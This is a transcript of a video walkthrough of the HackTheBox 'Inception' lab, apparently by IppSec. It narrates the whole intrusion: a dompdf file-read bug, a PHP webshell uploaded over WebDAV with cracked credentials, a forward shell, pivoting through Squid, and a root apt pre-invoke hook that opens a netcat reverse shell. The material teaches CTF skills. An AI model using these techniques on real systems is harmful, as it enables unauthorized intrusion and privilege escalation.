HackTheBox - Inception
Key Takeaways
The video demonstrates a cybersecurity challenge, HackTheBox - Inception, where the goal is to get remote code execution and dump credentials on an Ubuntu server version 2.4.1.8 with Squid proxy running on 3128. The video covers various techniques such as local file inclusion, PHP wrappers, WebDAV configuration, and exploiting vulnerabilities to gain access to the system.
Full Transcript
what's going on YouTube this is IPSec and when we do an inception from half the box which is a pretty darn cool box it starts off with just port 80 and a squid proxy being exposed you're supposed to hack around the website get remote code execution that allows you to dump some credentials then you can use the squid proxy to access programs listing on the loopback addresses of the Box much like the Joker video you access SSH use the credentials gain a local shell to the box and you couldn't do any reverse shells because the box can't actually route to you you can route to the box if you use that Ford shell technique I showed in the sokar video you can actually do this whole box without using squid but once you get a local shell on the box you escalate up to the root user and find out you're in a guest VM because there is no root text you then have to look at the art progress table notice that there is a box it's talking to which is the gateway exploit that box the host OS and that's where the route text file is so it's a pretty fun box let's just jump in first things first we store for the nmap scan so and map - SC for default scripts SV enumerate versions Oh a output all formats put in the end map directory and call the files initial then the IP address of Inception which is 10 10 10 67 it does take time so I've already ran this let's just look at the results we do see two ports open HTTP is listening on port 80 it is a Ubuntu server and it's version 2 4 1 8 so if you google this you could find out the exact distro of ubuntu running and we also have HTTP proxy known as squid running on three one two eight we'll look at this in a little bit but first things first let's just look at what's on port 80 because normally that is interesting so 10 10 10 67 and we just see a page we can try putting in any something in the email address and click sign up has some JavaScript to verify it's an email so just put something in fake and click we do get a thank you so let's send that over into burp and test one more time a at b.com make sure is intercepting to see if we can figure out what that javascript is doing or what that page is doing as soon as we click sign up we get a thank you and nothing happened in Berg so let's press control you to open up the source and right off the bat we see the HTML ends these numbers keep going and looking at this slider like there's way down at the very end we have to do test Dom PDF on PHP 7 so we know we have to look into that let's take a look at the javascript file and see if we can figure out what is happening so it says thank you when you sign up so let's just search for that string and right off the bat and I said off the bat a few times so I'll stop that but we do see a note here that says it doesn't do anything other than respond with thank you so we can stop looking at this page and take a look at what was in that source all the way at the bottom the Dom PDF so let's just put Dom PDF in the URL because I assume it's gonna be on the server somewhere so we could do Dom PDF dot PHP or other things but order bust should focus round Dom PDF and before I threw into it buster I just did slash down PDF and we see now we do get a page it doesn't exactly load we can click on the version and we see it is 0 6 0 click on the readme it responds back we can open up in a text editor and see exactly what it is the requirements are PHP 5 so maybe that's why it says test it on PHP 7 I would probably go to Google and try to figure out when Dom PDF 0 6 0 got released maybe it will just search Dom pdf CVE and see if we find anything 4 0 6 0 so before 0 6 1 and 2014 it had a lfi and says using protocol PHP wrappers in the input file parameter as demonstrated with this and we can also do a search on Dom PDF to see if there's anything in exploit dB this one looks like exactly what we just read we have one in beta let's ignore the beta 1 because 0 6 0 is the exact version we saw on the readme so not really in the version file so we do a search boy - x4 examine and then paste it in the path to open it up and this is a bit more detailed than the actual CVE so it gives us a proof-of-concept right here let's just test that out we just have to replace example with 10 10 10 67 and then add the Dom PDF folder before Dom PDF PDF it's a lot of PDFs and for the file let's stuff with Etsy passwd because that's normally where it has to be I think world readable and we do get a PDF document we can open up with a PDF reader and we do see a lot of base64 string so if we copy this and paste it so we do echo - n base64 - D it looks like my copy dank it the entire string cuz that's pretty small for it Etsy passwd but we do see it's turning off so let's just intercept this into book so go to http history click on the request control artists and repeater click go and we can see the results it is a PDF and scrolling down we see more basics before then we copied so we can just copy this do echo - n base64 - D and we can see we do get the passwd file and there is also the user KOB on the machine so we have to probably create something to make this a bit easier because doing this every time is a pain but before we do that let's see if we can get any command execution so if we can probably trick this to read data we could insert PHP and try to get code execution so let's try a few other files we know the server is running Apache so let's try VAR log Apache to access log we don't get anything we get an internal server error so let's just put invalid file and see if we still get this 500 so we do so we know maybe if we get can't read the file because of permissions or the file doesn't exist it says 500 so that doesn't really help us that punch we just put a folder we get error 500 so we can't even enumerate folders so the next thing I do is enumerate the Apache configuration so Apache 2 we can look on our machine because Callie's based upon Debian and Ubuntu is based upon Debian the Apache configurations probably going to be the same so we do Etsy Apache 2 we can look at Apache 2 kampf and see where the log files are being written to and there's a good chance this isn't readable by our user but it's still something good to check if we didn't want to do base64 every time we can probably just change this convert base64 to string and then just read it here but man is that ugly so I'm gonna undo that and I'm gonna write a script to just automate this because looking at files individually is a huge pain actually I lied one last thing to check let's Google PHP wrappers and see if we can get code execution Google that with code execution see if we find something this one may be good and we can look a little bout rappers what they are we just Google PHP rappers go to this manual you can see different things you can do like access files URLs PHP compressed files which are good if you have file uploads SSH that's an odd one expect going to this blog we can try to see a few things I hate skimming in videos so we're just going to do it one of the rappers is the expect so if expect is enabled on the server we should we will just do expect colon slash slash ID and we can't so that one's disabled then we could try data tech slash plain comma something so we'll do tests and that gives an error so these are the two common methods of testing that we can test a bunch of other files so we could try doing was that PHP read proc self environment and this may tell us what environment variables that we may build controller at least the user HTTP running as but we can't access that either so now we can actually begin writing the script to automate exporting files so let's open up V and create the file inception - read dot pi we know we're going to need the request module also we're going to need build a base64 decode so we're going to do from basics for import b64 decode and the reason why i'm avoiding the string wrapper if we went back to that let's see patchy to patchy Kampf I think no one should remember that location apache2 Kampf if we look at this and just did it base64 encode it so read equals string we can see it's probably gonna be doing a lot of escaping that doesn't naturally exist like everything with the parentheses has a backslash before it so that's why I just want to basically force don't have to deal with it actually modifying the output and then what's another thing we need import regular expressions because we're gonna have to grab the output of the page and grab only the base64 piece so let me create a function called get file and I'm gonna pass at the parameter file and we have to create a payload that we send to the server that is the actual argument so if we just copy up to resource it'd be a lot easier so and put underscore file colon this plus file then we want to actually send the requests so we can create a new variable called response and do requests get the IP of Inception which is 10 10 10 67 then the path to the vulnerable program which is dom PDF PDF dot PHP then we can specify the parameters we want to send a payload string now we want to grab the text of that request and then we want to strip any space at the end empty lines let's see that's good I close that parentheses so that is good now we need to create a or just grab the base64 so when do be 64 equals re for regular expression let's the module we had imported dot search and we have to find something and the response so let's go over and look at this we can see the string begins with a bracket than a parenthesis and there's our special characters so I'm going to put back slashes before them to escape and then we want to grab everything so we need to put another parenthesis because this tells no expression what to match will do dot stir question mark and that will copy everything but I think new lines because we had specify that and then it ends with a frenzy and bracket so that's that as well and we want to grab the very first match so we'll do group one and then we can return the base64 decoded output of be 64 so that should be that function and we can just call this font real quick to test it out so get file that's the passwd so if we execute that we get no results because I did not print it there we go it looks a little bit ugly it and code to this all as a byte so let us try to decode this so we can do print get file maybe we can just do decode does it have that function it does so decoding it decoded the binary format to a string and the reason why I said binary is because it had be then this single quote I hope that means binary we also see the slash ends where y breaks are supposed to be this still isn't really that efficient though for grabbing a bunch of files and doing good enumeration so we can do it for infinite loop and say CMD is equal to input then we can try this function and the reason why we're doing a try is because if we get an actual error we don't want the program to crash we just wanted to tell us hey you made a mistake so output is equal to get file CMD then we can print output dot decode then add the exception handler it's except and then just print error so if all goes well we should have a nice little program so we input Etsy passwd and we get past WD we could do let's see hosts we get that file so let's poke around this box and see what there is so let's do proc self and vayan nothing proc self FD 0 can access that and this is just trying to enumerate information about this process so we can't get into proc self let's move on won't be another good thing to look at Etsy shadow if we are route we'd be able to read that we can't so we're probably the HTTP user normally Apaches not running as anything else so let's look at the Apache config again because it was ugly and have a type of their Etsy Apache to match dude calm and that is much prettier so where is the log file stored is it very log Apache - sure just search for log so slash log nothing there hostname woke up now era log so Apache log directory error so you do we know what that is I don't know where Apache log directory is stored but let's look at the actual site config so if we go back to Ubuntu machine and go into let's see Apache - we see there are mods - available insights - available and sites - enabled so it's not your neighbor we'll probably the best one to look at so 0 0 0 - default Kampf so if we do let's see patchy - sites - enabled slash 0 0 0 default comp we do get some results so we got virtual host store 80 it's serving out in the verb dub dub HTML directory and we also see there is a web dev test inception directory and it's requiring credentials and the credentials are in this file so let's grab that file and we see they are hashed and the user is WebDAV tester so now we have two users on this box web dev tester and cob so we may want to start creating some good notes so we do users we got cob WebDAV tester don't really have any passwords yet but we should be able to crack one so copy that go into the Kraken and this is just one of my computer's I used to craft passwords with I could do the VM but VMs generally don't like password cracking especially when I'm doing video recording so that's why I'm using a different box so we do hash cat V I have a for record hashes and this will be inception dot hash ace this and I'm not sure exactly what that format is we could do hash cat - H and probably guess from looking at this however I don't like using that I like just googling hash cat example hashes and the reason why I like this page more than the actual help of hash cat is it gives us examples so it started off with a dollar a PR and right off the bat we see that is the Apache format example hash this looks like exactly what we have it is 1600 so let's do hash kam 1600 specify the hash so hashes inception and then a word list and since there's CTF I'm just gonna specify rock you text first we off to do anything fancy if it's meant to be cracked it's normally in the rokkyo thing and you don't need a bunch of graphics cards to crack this it's a relatively quick thing again I just hate running hash code on my VM when I bring other things on this machine like recording turn off and we get the password crack right away baby girl 69 so let's go back into our notes and create PW thing and just paste that password I'd only use cherry tree or something when I'm actually taking notes but for this just creating text files is fine and the reason why I like cherry tree is you also have hotkeys to take screenshots and that just makes life easy I don't have exit on that so we can stop that and look at what is in that WebDAV directory so let's see it is ten ten ten sixty seven it was WebDAV underscore test underscore inception we got a user name it was WebDAV tester the password was baby girl with a u69 get a forbidden message so let's test if we have upload privilege to web dev I believe this was back on granny and was a Windows XP box that we did this with maybe was grandpa it was one of those videos but we can do curl Oh actually before we upload a show let's copy it here so ah show PHP CMD dot PHP and we don't need these characters the beginning I forget what video we put those in but that is just stuff to make it look like an image I do file CMD PHP oh no it's not maybe they got clobbered that's normally what I do but I guess then we met the way about that there so just clean that up do you want to see the file it's very simple just echoing the results of a system command and gain the parameter yep so let's upload this file so Col - - upload - file then we can specify the file name which is CMD PHP then we gotta say where to upload it to so HTTP colon slash slash 10-10-10 67 web dev test inception and web dev is like a web file browsing protocol that allows uploads and stuff so that's why I'm testing this we can specify the user with - - user WebDAV underscore tester : the password babygirl 69 and I probably should specify the filename and the destination I don't know if I have to or not don't get anything back that is odd so I'm going to cold - vvv and we're completely uploaded and fine so it looks like it did upload the file so if we go to CMD dot PHP we don't get it forbidden if we went to something that didn't exist on the server we get not found so we can say it equals LS and we get a shell so if we wanted to we could take a shell from one of the previous videos like Soaker which was a von Hamish een I did not too long ago and I'm gonna take that shell because it's like 70 plus lines of codes I don't feel like retyping so I'll explain the shell quickly and if you want to watch me code it you can actually just watch the soap gar video so move that to inception - run dot PI I guess I should name that shell but oh well there we go so we have a few modules we have the request time so we can do sleep base64 random you'll see when we use that and threading so we could run something in the background so we got this thread that's just running a loop constantly then surco was a show shock video so we have shell shock here and we're writing in right in the command we want to execute into a file to run it actually be easy if I just serve this one small part so the theory behind this thing is to get a TTY over HTTP requests and I guess I could show you I kind of jumped ahead that we can't do any reverse shells because there's a firewall so forgot that enumeration step so I guess we can yeah I don't really have time to show that so apologies but if you did a bunch of reverse shells you find out they don't work so that's why I jumped over to this so we can grab a bank copy so I'm just gonna do this to copy it so you'll notice this looks very similar to the reverse shell we normally do with netcat except instead we're doing it with files and we have to create two files so we'll do tap input dam input and temp output so we're creating a named pipe at slash temp input and then we're going to be reading that named piped and then sending everything over to bash and then having bash set it over to output and what this allows us to do is kind of establish a persistent shell because if we just send commands one at a time we don't keep it so if we do like CD dot dot and then did another command it read ran the Shelf in the beginning and we don't keep that session so this enables us to keep that so if you run that command we see it hangs but if we echo who am I in to temp input and then read temp output we get the results of that command we can also do that like ifconfig to show it so that's exactly what this script is doing and the reason why we have thread is because the request finishes immediately and we want to read the file or output file like every second so we can get the results we have to fix this to be not shell-shocked we'll just use a PHP script that we uploaded so get rid of actually we'll just name this payload and we want to have a payload be yep because that's the pram that we send to execute code is it get rid of shell shock and echo or command a 64 - D SH and think that maybe all we're doing yeah I think that's it so edit the actual request to be request post I have to fix that IP will fix that waiter with a said because to make that change multiple times we can fix headers with the sent fix everything was said so percent s first search and replace or said and then 172 1610 138 five nine one then we'll escape CGI - bin and escape that / - for cat and then we'll replace it with 10-10-10 67 escape the slash was it WebDAV test inception is that the folder yep escape that / CMD dot PHP do a global search on a place it should replace it in two places and we type that correct so now the next thing we have to do is replace the headers so headers equals headers I'm gonna say that is now params is equal to payload and params is the parameters for a post request and payload is this variable that we just created okay and we also have to add or authentication because if we run authenticate if we can't hit that file so off is equal to web dev tester I believe that was the user and then the password is baby girl 69 and we actually have to put that in quotes and that should be good go down here just hit period to redo everything we did with that session and that did not work so we'll just retype it WebDAV tester baby girl 69 and I need off okay clean this one up because we don't need shell shock we need okay and this is payload if this is all complicated we actually don't have to do all of this there is another route to go but this is the route I had done on the Box when I was doing it so I'm showing you that first and then I'll show you the other way to go about it so that all looks good if we do a Python 3 on this we'll hope we got everything correct and we did not we forgot a comma so after this off we need comma and if I did the same mistake here okay and we probably I guess want a space here guessing no oh all equals there we go so it's creating a shell and then if all goes well we can do LS and see files so if we go up a directory do an LS we see a actual WordPress directory that we didn't see before so we can look in this do another LS and we got wp-config.php to look in the database and we can grab the credentials for WordPress we got root and then this password so we can try to su to see if the my sequel has the same password we need get any response back so this is where this show comes in really cool as we can just do Python C and put PT y PT y dot spawn and bash and because it's the persistent session and not just erasing every time I think I may have a typo there should show something back and echo password that's not so we do which Python Python 2 is not installed do we have Python 3 we do so we can do python 3 c and port PT y PT y that's spawn then - and that's what i expecting to see it looks like we have loaded bash and we should be able to now do it su - it's asking us for the password we can paste the password do it Who am I authentication failure so we know there's also the cob user so let's try that and copy user had reused that my sequel password the other thing we could have done is like my sequel - you root - capital P and my seek was not found that's stat - al NP grep for 3306 which is the my sequel port that's stat - Aon P grep for listening and we have my sequel is even installed on this box so that is why I didn't go digging into the my sequel database when I saw that password and immediately started trying it with user passwords because why would a person put in the password in that configuration file and try to set up WordPress when there's no database we could also go back up and see the host is on localhost so that was the clue that made me try different users with that so we can do a sudo - shell to see if com can do anything paste the password in do it Who am I well look at the output of sudo and we can see he may run every command on it so sudo su and we're root so if we just went to the root directory we should be able to cat root X and get the flag unfortunately the flag is not there it just says you're waiting on a train a train will take you far away wake up to find route text so it's not there and before we continue we could keep doing it in the shell but I'm going to show you the intended way to get up to this root path and that is through SSH if you did the EMP you see it is listening when Isis H but we didn't see that before it is on squid so if we actually went back and enumerated squid we would have known to use squid to proxy back to the box kind of like a server-side request forgery and we could access the SSH port and just SSH in once we found this password so let's go here v pw put the password we found and look in the squid so let's go to firefox we can do options on foxy proxy and we can edit we'll just add a new proxy and say 10-10-10 67 on port 3 1 2 and then click okay is it something on general where I can give it a name well name this inception close that right click here let's load inception and then go to 10 10 10 67 access is denied but we're not getting a user prompt so I'm gonna try 127 0 0 1 and we get on the page so it went to squid and told squid hey go to localhost and pulls up the page and we another video that has squid is Joker if you want to take a look at that but since there's no credential in this makes it really easy we can just edit proxy chains comm and proxy chains is a program that makes non proxy aware things proxy aware so let's just add a thing to say HTTP because that's the type of proxy squid is the location which is 10 10 10 67 and the port 3 1 2 8 and then now we can send any command through the proxy so if we want to do proxy chains and map and we have to specify full TCP scans by default does a syn scan which only sends that for a syn packet and watches for the response of the server if it's a syn ACK it says the ports open we can't do that through a proxy so we have to do the full TCP scan and then the IP address which is 10 10 10 67 and we know point 22 is open so to make it go fast that's best 5.20 to do dash n for no dns and 10 to 10 67 it's saying it's closed let's tell it to go to 127 0 0 1 because it's not listening on the global interface is listening on 127 0 0 1 and we see ssh is open let's look at my local box add map - p22 127 0:01 just to make sure we didn't just and map ourselves and we see my local box has ssh closed so we know we should be able to ssh right in so leave that proxy chains command there do ssh cob at one 27001 put the password in i guess i copied something so cat BW grab the password put it in ssh and we can do the sudo su desk later root and now we have a real shell and we don't have to use that crappy Python thing we have been using so the next step is to find that root dart text file so let's run Linux enum to see if that helps us at all but to do that we have to put it on the box so we're gonna a cat when X prove ask Wendy numbed out SH and you should be able to just Google this and find it if you just Google Winnie num got SH github X clip selection primary that should put in my clipboard SH paste try the other clipboard there we go and before I do that we can look at if config to figure out why we didn't get the reverse shell we see 192 168 0.10 this box is IP is 10 10 10 67 so we are either in a VM or there's somewhere nap there's something weird going on because I don't see the IP we're accessing this box with so let's run Lenny num and see if that helps us figure out what's going on can take a little bit Tehran I forgot to revert this box there's a lot of weird stuff and a folder let's go to the results while we're waiting okay we're at the top so get the standard Ubuntu information Ubuntu 1604 inching there the hostname users that logged in of course cobs logged in that is us group memberships we got root and cob we can read the file shadow fall because we're running this as root there's the sudo password routes home directory a lot of weird stuff in it missions at home lacks of course files earned of course we're not looking at anything to do with reading or writing files because well we're route of course we can SSH keys shells cron jobs contents Network we got something in the art history 192 168 0.1 that is the gateway of this box listening TCP and UDP not too interesting process and binaries sudo version actually don't think it's doing what I wanted it to do and as the output of the mount command that's where I've been scrolling to look at and don't see it so if we just ran mount to look at what's melted we see a bunch of LXE stuff now Lexi is Linux containers and if you went to the calamity video I kind of explained that a little bit because we used a Lexi for profess calm clam me instead of doing that giant buffer overflow but the odd thing is it's an LXE thing and we only have one interface and that's not the interface we wanted so we can guess that we are in the guest OS and 1 I 2 1 6 8 0.1 it's probably the host OS so if we do which and map we don't have an apple in this box we can probably paying 1 I 2 1 6 8 0.1 and if we want to end that we could go back to our box and say and Matt - proxy chains and map - st on one eye - 1 6 8 0.1 and then do - oh a doubt put all formats and the end map directory and say Gateway will call the file and that's going to take a while to run probably before we do that we have to do - capital P n to not ping through the proxy chain and then - n because we don't care about DNS and then we see it trying a bunch of ports if we wanted to do this a little bit faster we could just install and map on this box forget what video I did it if you probably YouTube epic alien it'll pull up that video maybe it was ten tens video I don't know but there was a video where we installed and math and we actually grabbed I think the rpm and convert it to a Deb we grabbed the Deb and converted to an RPM but if you wanted to you could just statically compiled and map will pull a statically compiled and map from the internet static compile means it just adds all the dependencies in the binary which makes it bigger but it also makes it so well you don't have to install the premises everywhere so if we just Google static compile and map make sure we're not going through the proxy we get a guide on how to do it but then we also get a github page with a bunch of static binaries so we're just go to the github page and right off the bat we have an map on 64-bit if we go to SSH you name - a we see we are 64-bit if you want to look at other binaries there's just loads and loads of them but add map is what we want view the raw I mean just copy link location do W get on that file let's resolve it here's the thing a while that is on inception we have to do back on our inception box so do we get the file and we can move and map a rename it to be static - add map I didn't want to just do add Matt because I got a folder add map so I had to name it something else and then to upload the binary we could either base64 encode it but that's a few megabytes and that would take a while so the best route is to just do a upload file command the same exact way we upload the PHP shell so we can do go - - upload file static and map specify the user and we'll specify location ad - vvv so we can see the headers and it hasn't finished yet we're completely upload the file we got 201 created so if we go back to SSH go for a dub dub dub HTML web dev test inception we do have a static add map created so let's just copy that into dev s hm and we can see my script creating random things here so we can do chmod plus X static - and map now if we execute this we have ed map looking at the results said everything is closed that is odd something should he came out maybe that proxy can't hit 192 168 0 1 I'm not exactly sure what went there what happened CIP right - eh hey and don't do DNS 0 1 is that what I have 0 1 I really hate that yeah I'm not sure why that's happening normally you can use proxy chains and and map through it I guess not on this case if you want to do an Maps or a proxy Sox proxies work much better than HTTP I found but let's go back to just getting n map on this box so if we go to this page one if he says something here whoops back start line areas notes it wants us to set that and map directory so we can tell it where the actual end map scripts are so if we want to do scripts on that map we should copy scripts to the server and put them in this end map dir so let's do that because scripts are a nice thing to have with that map so we can do we'll Kate NSC dollar sign I think would specify - are for regular expression and where are they user share and map scripts this is what we want so let's create a tar CBF do capital it's a capital X I think it's capital J 4 X Z capital X would make sense but I think it's capital J and map - crypto dot X Z face the director we want oh we turned it inside of that we know what the full path we just want it right here I'm actually going to copy a Tyranitar which is going to be ugly but oh well so let's remove that file we had created so we have dot I dot X Z if we do upload file we can now upload this to the server so and map - crypto XZ created it go back to inception and a folder we can extract it to X capital jvf and matte scripts let's see extract capital j MV and map scripts slash tab let's try this what if it just doesn't have XE on the server x JV f my blocks tracks it so let's instead of compressing it let's just not compress it and then we can upload that file created move this temp to x VF and map scripts I have J as a habit okay and we have it copied and copied user share so we can create let's go back and we can move user share and map into user share and if we go execute and map which I think I put in dad s hm you should be able to do - capital s c sv actually before we do that read this and set this variable so we can echo and map directory we see we don't have that environment variable set so export and mapped er is equal to user share and map scripts that's what it is and I think it just once user share and map I probably should have copied and used to share and map instead of specifying the script directory we'll see what happens what's the worst that can happen so M map - SC s V and then the IP address of the Gateway for nine two one six eight zero one we have to do start slash static - that map feel to initialize script engine so let's copy user share and map CBF I don't know if that actually is gonna fix anything and this is why I should always do more testing before I record a video because you always run into small things you don't expect you're just gonna slash we can turn xvf dub dub dub HTML web dev test inception and and that doctor okay let's read run that command and hope for the best and map - a CSV one nine two one six eight zero one you don't have add map in the path so we can do that still aired oh these NSE scripts require a newer version of man map so we'd have to stack compile a new version of and map to make these scripts work so we're just going to ignore scripts and just do dot slash static and map on 192 168 0.1 it would help to actually read the error message before we go out and troubleshoot it shouldn't take too long and it's done we got three ports open SSH DNS and FTP so the first thing we do with FTP is just try anonymous login and we got the banner 3:03 so since we saw a version we can search boy vs FTP D and we don't have anything for 3 0 3 so specify the user anonymous and it loads this in so there are a few files we want to look let's go to CD proc self and get and vine to open let's go to net and we can get TCP zero bytes get UDP zero bytes if we actually had files there I'm switch to ask you and try to get it had bytes this would be which ports are open on the box so we wouldn't have to do a full nmap scan or things like that so let's see what else can we get let's go to Etsy get past WD got that let's see what else can we get it's good uh an it D see what services are running on the box we got a polymer check out fast cron W clock there's lxd there we got a TFTP service that is interesting so let's get that was it tftpd dot - HP a transfer complete cat that file see at the beginning is it says the default for the configurations probably an etsy default TFTP deed - HPA so let's add TP again say I wanted this as team ox get out of FTP team ox we do so I have my team ups right now bound to control beef in the modifier so every time I wouldn't do a split pane I just hit control B twice and now we can multiple windows and inception control B twice and then like oh there we go that's why it's sometimes buying the modifier of my host OS to control a so I don't have to do that because sometimes hitting each will be twice just doesn't work but now that we have two windows into Inception we didn't have to do that SSH twice which we probably could of but oh well when I do one six eight zero one not amiss and let's see let's see default and we wanted tftpd - HPA and we can cap that file and we see it's running as root for at 69 and we can create files so let's try that so we can do tftpd one i - one six eight zero one not the TFTP CD temp can we CD no I guess we can only put and stuff so put we do that let's create a test file exit touch hip sack TFTP again we can put hips ik in slash temp and we spent have to specify the path so put hip sack and slash tab hip SEC we go to temp and FTP we see if SEC is created and it's UID is zero so we have actually created file as the root user so we know TFTP is actually running as root so the next thing we're gonna do is try to get root ssh ID underscore RSA fo not found get root not SH found must have global reaper get root dot junk file not found so unlike the file read when we're doing it over HTTP we can now enumerate what are valid folders and not because we have found out found versus global reaper missions so this error message a bit more verbose which gives us more information what are other good files to get we can get etsy shadow must have global repercussions get a spool Krong tabs root file not found so we can probably create eight crontab for root so let's try that so if we go back up here we can exit STP we can create a file called root and say every single minute touch tab pound and now we can put root and verse four contacts root root oh no contacts root is all we want well I'm not found oh no Israel twice no it's not I screwed up put route vers bull route now krong krong tabs route I think I'm screwing that up the whole time yeah so we can get that file spoole cron gone tabs route nope can't get that file either so even though we're the root user we're having a lot of trouble pulling configurations we want make that completely big let's see what else can we do get Etsy crontab if we look at Etsy crontab we do have a cron running every five minutes it's an apt upgrade very log apt custom dot log so if we create a pre invoke script for app we can actually get command execution so there is something to do a like configs before and after you run app and we can actually configure that and we do so by creating a file and Etsy app tap comp so let's go back up here where we can create files we're going to create zero zero shell it can be called anything I think water of execution is based upon file name so zero zero execute first year one execute second etc but the actual thing we do is app update pre and VOC and then then bash tab you do EPS at Sh so if we upload this file to the server and before we do that we can go back to FTP anonymous CD town we never created pwned so that contact never ran and I think it's because the file is Ward readable and for the krons I think it has to be a bit more secure than that but I digress we have to create that if SEC file so V if sec it'll be been bash and it'll be faster - I have TCP if config 1010 1430 1010 actually I don't know if the Box can route to us so this is where having team bucks and so on the server is nice because we don't have to open up 100 sessions to the box 192 168 0 10 and we'll say port 8000 see if that command works and if that doesn't oh I guess we can do paying - c11 I do 1 6 8 0 10 and that will tell us it ran most likely that box can ping us and mate this bash command may not actually work but ping definitely will if it executes 0 10 there we go so now we got to upload these files so if we cat let's just clear that cat 0 0 shell and we can do put zo zo shell and let's see at app Kampf D / 2 0 0 so I just put it there and we also got to upload it sector Sh so if sector SH and Tam EPS SH okay and Cl vnp 8,000 I'll thank God and see his own I was about to cry was like I never tested if and C's on this box so every minute this should run and it should also TCP dump - I eat zero ICMP and we don't have TCP dump that's splendid so that ping isn't actually going to help because we don't have TCP dump date so in about 30 seconds we may get a show we may not so I guess one thing we can do quick if we're fast if sector SH we do get a shell from the guest so chances are the guest hasn't installed the host will as well I think I just missed my window and CL VMP 8,000 where's my control see in this window going through to that window Oh probably cuz I'm pinging me it's not paying maybe it's not - see Mavis - n-no - she works it's not ping PS yeah grab it Zack Gill four three three three okay let's start that again and Cl VMP 8,000 listening oh my god I'm just one inhale of commands so I think that window closed date so in about 40 seconds we should get a shell so I'm gonna pause the video and we will resume in probably 40 seconds it's been about 40 seconds so we should get a shell any second now there this and it looks like it may have aired again we drop back to pretty much the same exact prom whoops one temp and we were in dev s hm we're route IP addr for address and it looks like we are on the route machine so I guess I understand why the Machine got its name the user and host name for the guest and route or the exact same so if you didn't notice the directory change when we got that shell let's go up let's see right here then you may have just not noticed you got the river shell because it looks like based upon this error message you just crash and get dropped back to your show but from there they sit down to temp and yeah so forget a root WC - see for a character account because we don't want to show you the flag 33 characters mb 5 some study - you got one line break so this is the host machine and that is your route text and this concludes inception hope you guys enjoyed the video take care and I'll see you next week
Original Description
01:05 - Start of Recon + Finding dompdf
08:30 - PHP Wrappers + Failed testing for RCE
11:35 - Writing Python Program to automate file disclosure bug
18:40 - Finding WebDav Configuration + Uploading Files for RCE
25:50 - Modifying Sokar's Forward Shell (PTY over HTTP)
33:55 - Forward shell returned
38:50 - Using Squid to pivot to ports listening locally + NMAP via ProxyChains
47:48 - Getting nmap on Inception to speed up scanning private network
59:16 - Nmap results returned for 192.168.0.1, FTP Anonymous Login
1:01:15 - Finding TFTP as a Running Service
1:06:35 - Using TFTP to grab crontab & creating a pre-invoke apt script
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 35 of 60
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
▶
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
More on: AI Security
View skill →Related Reads
📰
📰
📰
📰
SABSA: A Business‑Driven Framework for Enterprise Security Architecture
Medium · Cybersecurity
The Chip Lockheed Forgot to Lock: Ukraine’s Soldering-Iron Override That Turned an 80km HIMARS into…
Medium · Cybersecurity
When the Open Web Fails, the Darknet Explains Why
Medium · Cybersecurity
The Darknet Is Not a Place. It Is a Mirror.
Medium · Cybersecurity
Chapters (11)
1:05
Start of Recon + Finding dompdf
8:30
PHP Wrappers + Failed testing for RCE
11:35
Writing Python Program to automate file disclosure bug
18:40
Finding WebDav Configuration + Uploading Files for RCE
25:50
Modifying Sokar's Forward Shell (PTY over HTTP)
33:55
Forward shell returned
38:50
Using Squid to pivot to ports listening locally + NMAP via ProxyChains
47:48
Getting nmap on Inception to speed up scanning private network
59:16
Nmap results returned for 192.168.0.1, FTP Anonymous Login
1:01:15
Finding TFTP as a Running Service
1:06:35
Using TFTP to grab crontab & creating a pre-invoke apt script
🎓
Tutor Explanation
DeepCamp AI